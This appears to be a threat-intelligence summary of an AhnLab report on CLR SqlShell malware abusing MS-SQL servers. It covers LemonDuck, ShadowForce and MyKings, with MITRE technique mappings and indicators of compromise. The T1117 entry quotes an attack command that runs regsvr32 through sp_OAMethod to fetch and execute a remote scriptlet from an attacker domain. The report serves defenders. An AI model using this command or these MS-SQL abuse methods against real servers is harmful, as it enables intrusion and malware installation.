CLR SqlShell is a DLL-based malware component used on MS-SQL servers to run threat actor commands and enable post-exploitation activities, including loading additional malware like CoinMiner or ransomware. The article details how various SqlShell variants abuse MS-SQL features to execute OS commands, download payloads, and privilege-escalate, with examples tied to LemonDuck, ShadowForce, MyKings, and other families. Hashtags: #LemonDuck #ShadowForce
Keypoints
- SqlShell refers to CLR Stored Procedure DLLs used on MS-SQL servers to execute commands and install further malware.
- Attackers target poorly secured MS-SQL servers via external scanning (port 1433) and brute-force/dictionary logins with sa privileges.
- OS-command execution on Windows through xp_cmdshell, OLE Stored Procedures, MS-SQL Agent Jobs, Extended Stored Procedures, and CLR Stored Procedures is a central attack vector.
- LemonDuck and other families use CLR Stored Procedures (e.g., evilclr.dll, shaw20211224.dll) to download payloads and expand malware like CoinMiner.
- ShadowForce (CLRSQL, CLR_module) leverages PingCastle integration for information gathering and privilege escalation within Active Directory-focused campaigns.
- CoinMiner, proxyware, and downloader variants (MrbMiner, MyKings, LoveMiner) are commonly installed via SqlShells, often as droppers or downloaders.
MITRE Techniques
- [T1059.003] Windows Command Shell – xp_cmdshell is used to execute commands in Windows shell via cmd.exe /c. Quote: ‘xp_cmdshell commands have a feature that executes commands received as arguments in Windows shell. Windows commands executed as xp_cmdshell commands are run via “cmd.exe /c” commands by the sqlservr.exe process.’
- [T1117] Regsvr32 – OLE Automation Procedures leverage regsvr32 to load and execute DLLs (e.g., the reproduction showing regsvr32 usage). Quote: ‘CMD > sqlcmd -S [IP 주소] -U sa -P testsql… EXEC SP_OAMETHOD @shell,’run’,null, ‘regsvr32 /u /s /i:hxxp://js.f4321y[.]com:280/v.sct scrobj.dll’;’
- [T1053] Scheduled Task – MS-SQL Agent Jobs register tasks that execute Windows commands. Quote: ‘MS-SQL Server Agent Jobs allows the registration of tasks that execute Windows commands.’
- [T1129] Shared Modules – Extended Stored Procedure/DLLs are registered and loaded to extend SQL Server capabilities. Quote: ‘Threat actors create malicious DLLs, registers them with the sp_addextendedproc command, and then executes the export function of the DLLs to load the malicious DLL and run the export function responsible for malicious behavior.’
- [T1059.007] JavaScript – Active Scripting supports using JS for scripts executed via SQL Server Agent/SQL Shell. Quote: ‘the ActiveScripting method that makes it possible to use JS or VBS scripts.’
- [T1059.008] VBScript – Active Scripting supports VBScript in addition to JavaScript. Quote: ‘the ActiveScripting method that makes it possible to use JS or VBS scripts.’
- [T1055] Process Injection – Metasploit-based shellcode execution in memory (Meterpreter/backdoor) after loading SqlShell. Quote: ‘Metasploit installs the following SqlShell… responsible for executing the received shellcode in the memory of the sqlservr.exe process.’
- [T1105] Ingress Tool Transfer – SqlShells download and install payloads from remote URLs. Quote: ‘downloaders that download and install malware from specific URLs.’
Indicators of Compromise
- [MD5] 383d20de8f94d12a6ded1e03f53c1e16 – LemonDuck (evilclr.dll) – Malware component used by LemonDuck
- [MD5] 3e81a45507aea0945c57b67f193138a2 – Simple SqlShell (test.dll) – Sample DLL variant
- [IP] 88.214.26.9:13785 – Metasploit Meterpreter C2
- [Domain] vihansoft.ir:3341 – MrbMiner C2
- [File name] evilclr.dll – LemonDuck CLR Shell
- [File name] shaw20211224.dll – Shaw20211224 CLR Shell
Read more: https://asec.ahnlab.com/en/52479/